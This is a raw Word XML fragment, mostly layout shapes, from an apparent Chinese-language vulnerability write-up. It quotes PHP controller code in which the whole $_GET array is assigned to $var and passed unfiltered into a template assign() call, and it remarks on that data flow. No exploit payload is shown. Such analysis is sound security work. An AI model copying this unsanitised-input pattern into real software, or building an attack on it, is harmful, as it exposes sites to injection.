            <v:rect id="_x0000_s4688" style="position:absolute;left:785;top:4486;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4687" style="position:absolute;left:885;top:4486;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4686" style="position:absolute;left:985;top:4486;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4685" style="position:absolute;left:1085;top:4486;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4684" style="position:absolute;left:1185;top:4486;width:1325;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4683" style="position:absolute;left:2510;top:4486;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4682" style="position:absolute;left:2631;top:4486;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4681" style="position:absolute;left:2751;top:4486;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4680" style="position:absolute;left:5;top:4749;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4679" style="position:absolute;left:185;top:4812;width:5181;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4678" style="position:absolute;left:5;top:5075;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4677" style="position:absolute;left:185;top:5138;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4676" style="position:absolute;left:285;top:5138;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4675" style="position:absolute;left:385;top:5138;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4674" style="position:absolute;left:485;top:5138;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4673" style="position:absolute;left:585;top:5138;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4672" style="position:absolute;left:685;top:5138;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4671" style="position:absolute;left:785;top:5138;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4670" style="position:absolute;left:885;top:5138;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4669" style="position:absolute;left:985;top:5138;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4668" style="position:absolute;left:1085;top:5138;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4667" style="position:absolute;left:1185;top:5138;width:2048;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4666" style="position:absolute;left:3233;top:5138;width:102;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4665" style="position:absolute;left:3335;top:5138;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4664" style="position:absolute;left:3455;top:5138;width:102;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4663" style="position:absolute;left:3557;top:5138;width:3013;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4662" style="position:absolute;left:5;top:5401;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4661" style="position:absolute;left:185;top:5434;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4660" style="position:absolute;left:285;top:5434;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4659" style="position:absolute;left:385;top:5434;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4658" style="position:absolute;left:485;top:5434;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4657" style="position:absolute;left:585;top:5434;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4656" style="position:absolute;left:685;top:5434;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4655" style="position:absolute;left:785;top:5434;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4654" style="position:absolute;left:885;top:5434;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4653" style="position:absolute;left:985;top:5434;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4652" style="position:absolute;left:1085;top:5434;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4651" style="position:absolute;left:1185;top:5434;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4650" style="position:absolute;left:1426;top:5434;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4649" style="position:absolute;left:1526;top:5434;width:800;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4648" style="position:absolute;left:5;top:5727;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4647" style="position:absolute;left:185;top:5790;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4646" style="position:absolute;left:285;top:5790;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4645" style="position:absolute;left:385;top:5790;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4644" style="position:absolute;left:485;top:5790;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4643" style="position:absolute;left:585;top:5790;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4642" style="position:absolute;left:685;top:5790;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4641" style="position:absolute;left:785;top:5790;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4640" style="position:absolute;left:885;top:5790;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4639" style="position:absolute;left:985;top:5790;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4638" style="position:absolute;left:1085;top:5790;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4637" style="position:absolute;left:1185;top:5790;width:1928;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4636" style="position:absolute;left:3113;top:5790;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4635" style="position:absolute;left:3233;top:5790;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4634" style="position:absolute;left:3354;top:5790;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4633" style="position:absolute;left:3474;top:5790;width:2049;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4632" style="position:absolute;left:5;top:6053;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4631" style="position:absolute;left:185;top:6116;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4630" style="position:absolute;left:285;top:6116;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4629" style="position:absolute;left:385;top:6116;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4628" style="position:absolute;left:485;top:6116;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4627" style="position:absolute;left:585;top:6116;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4626" style="position:absolute;left:685;top:6116;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4625" style="position:absolute;left:785;top:6116;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4624" style="position:absolute;left:885;top:6116;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4623" style="position:absolute;left:985;top:6116;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4622" style="position:absolute;left:1085;top:6116;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4621" style="position:absolute;left:1185;top:6116;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4620" style="position:absolute;left:1426;top:6116;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4619" style="position:absolute;left:1546;top:6116;width:2651;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4618" style="position:absolute;left:4197;top:6116;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4617" style="position:absolute;left:4318;top:6116;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4616" style="position:absolute;left:4438;top:6116;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4615" style="position:absolute;left:5;top:6379;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4614" style="position:absolute;left:185;top:6442;width:3253;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4613" style="position:absolute;left:3438;top:6442;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4612" style="position:absolute;left:3559;top:6442;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4611" style="position:absolute;left:3800;top:6442;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4610" style="position:absolute;left:5;top:6705;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4609" style="position:absolute;left:185;top:6768;width:3615;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4608" style="position:absolute;left:3800;top:6768;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4607" style="position:absolute;left:3920;top:6768;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4606" style="position:absolute;left:4161;top:6768;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4605" style="position:absolute;left:5;top:7031;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4604" style="position:absolute;left:185;top:7094;width:3615;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4603" style="position:absolute;left:3800;top:7094;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4602" style="position:absolute;left:3900;top:7094;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4601" style="position:absolute;left:4141;top:7094;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4600" style="position:absolute;left:4241;top:7094;width:1326;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4599" style="position:absolute;left:5567;top:7094;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4598" style="position:absolute;left:5667;top:7094;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4597" style="position:absolute;left:5787;top:7094;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4596" style="position:absolute;left:5887;top:7094;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4595" style="position:absolute;left:6008;top:7094;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4594" style="position:absolute;left:6108;top:7094;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4593" style="position:absolute;left:6228;top:7094;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4592" style="position:absolute;left:6328;top:7094;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4591" style="position:absolute;left:5;top:7357;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4590" style="position:absolute;left:185;top:7420;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4589" style="position:absolute;left:285;top:7420;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4588" style="position:absolute;left:385;top:7420;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4587" style="position:absolute;left:485;top:7420;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4586" style="position:absolute;left:585;top:7420;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4585" style="position:absolute;left:685;top:7420;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4584" style="position:absolute;left:785;top:7420;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4583" style="position:absolute;left:885;top:7420;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4582" style="position:absolute;left:985;top:7420;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4581" style="position:absolute;left:1085;top:7420;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4580" style="position:absolute;left:1185;top:7420;width:1928;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4579" style="position:absolute;left:3113;top:7420;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4578" style="position:absolute;left:3233;top:7420;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4577" style="position:absolute;left:3354;top:7420;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4576" style="position:absolute;left:5;top:7683;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4575" style="position:absolute;left:185;top:7746;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4574" style="position:absolute;left:5;top:8009;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4573" style="position:absolute;left:185;top:8042;width:2410;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4572" style="position:absolute;left:2595;top:8042;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4571" style="position:absolute;left:2695;top:8042;width:200;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4570" style="position:absolute;left:2895;top:8042;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4569" style="position:absolute;left:3136;top:8042;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4568" style="position:absolute;left:3236;top:8042;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4567" style="position:absolute;left:3336;top:8042;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4566" style="position:absolute;left:3436;top:8042;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4565" style="position:absolute;left:3536;top:8042;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4564" style="position:absolute;left:3636;top:8042;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4563" style="position:absolute;left:3736;top:8042;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4562" style="position:absolute;left:3836;top:8042;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4561" style="position:absolute;left:3936;top:8042;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4560" style="position:absolute;left:4036;top:8042;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4559" style="position:absolute;left:4136;top:8042;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4558" style="position:absolute;left:4377;top:8042;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4557" style="position:absolute;left:4477;top:8042;width:400;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4556" style="position:absolute;left:5;top:8335;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4555" style="position:absolute;left:5;top:8661;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4554" style="position:absolute;left:185;top:8724;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4553" style="position:absolute;left:285;top:8724;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4552" style="position:absolute;left:385;top:8724;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4551" style="position:absolute;left:485;top:8724;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4550" style="position:absolute;left:585;top:8724;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4549" style="position:absolute;left:685;top:8724;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4548" style="position:absolute;left:785;top:8724;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4547" style="position:absolute;left:885;top:8724;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4546" style="position:absolute;left:985;top:8724;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4545" style="position:absolute;left:1085;top:8724;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4544" style="position:absolute;left:1185;top:8724;width:2410;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4543" style="position:absolute;left:5;top:8987;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4542" style="position:absolute;left:185;top:9050;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4541" style="position:absolute;left:285;top:9050;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4540" style="position:absolute;left:385;top:9050;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4539" style="position:absolute;left:485;top:9050;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4538" style="position:absolute;left:585;top:9050;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4537" style="position:absolute;left:685;top:9050;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4536" style="position:absolute;left:785;top:9050;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4535" style="position:absolute;left:885;top:9050;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4534" style="position:absolute;left:985;top:9050;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4533" style="position:absolute;left:1085;top:9050;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4532" style="position:absolute;left:1185;top:9050;width:2048;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4531" style="position:absolute;left:5;top:9313;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4530" type="#_x0000_t75" style="position:absolute;left:185;top:9376;width:620;height:200">
              <v:imagedata r:id="rId94" o:title=""/>
            </v:shape>
            <v:shape id="_x0000_s4529" type="#_x0000_t202" style="position:absolute;left:3;top:3;width:6750;height:9819" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="8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$var = $_GET;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126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'initNums'] =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model(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'Xdata')-&gt;</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>getConfig('weibo_nums', 'feed');</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126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'commentInfo'] =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model(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'Comment')-&gt;getCommentInfo($var['comment_id'], </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>false);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:val="left" w:pos="3428"/>
                      </w:tabs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'canrepost']</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:tab/>
                      <w:t>=</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:val="left" w:pos="4959"/>
                      </w:tabs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'commentInfo']['table']</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr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==</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333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'feed'</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:tab/>
                      <w:t xml:space="preserve">?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1 :</w:t>
                    </w:r>
                    <w:proofErr w:type="gramEnd"/>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="33333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0;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="124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'cancomment'] = 1;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="65"/>
                      <w:ind w:left="1179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获取原作者信息</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="112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$rowData =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model(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'Feed')-&gt;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 xml:space="preserve">get(intval($var['commentInfo']['row_i </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>d']));</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr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$appRowData =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model(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'Feed')-&gt;get($rowData['app_row_id']);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126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'user_info'] =</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333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$appRowData['user_info'];</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="65"/>
                      <w:ind w:left="1179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微博类型</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="112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'feedtype'] = $rowData['type'];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2298" w:firstLine="9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 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'cancomment_old'] = ($var['commentInfo']['uid'] !=</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="198" w:lineRule="exact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'commentInfo']['app_uid'] &amp;&amp;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/>
                      <w:ind w:left="180" w:right="-6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'commentInfo']['app_uid'] != $this-&gt;uid) ?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1 :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0;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50" w:firstLine="99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'initHtml'] =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L('PUBLIC_STREAM_REPLY').'@'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.$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var['commentInfo']['us</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:val="left" w:pos="4131"/>
                      </w:tabs>
                      <w:spacing w:line="215" w:lineRule="exact"/>
                      <w:ind w:left="1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er_info'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][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'uname'].'</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-23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：</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>';</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:tab/>
                      <w:t>//</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-24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回复</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:ascii="MS Mincho"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="174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assign(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$var);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/>
                      <w:ind w:left="11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display(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/>
                      <w:ind w:left="6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pStyle w:val="a3"/>
        <w:spacing w:line="247" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不管中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>间过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">$var </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>赋值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>$_GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并在最后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入了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-56"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">assign </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w: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a3"/>
        <w:spacing w:before="153"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
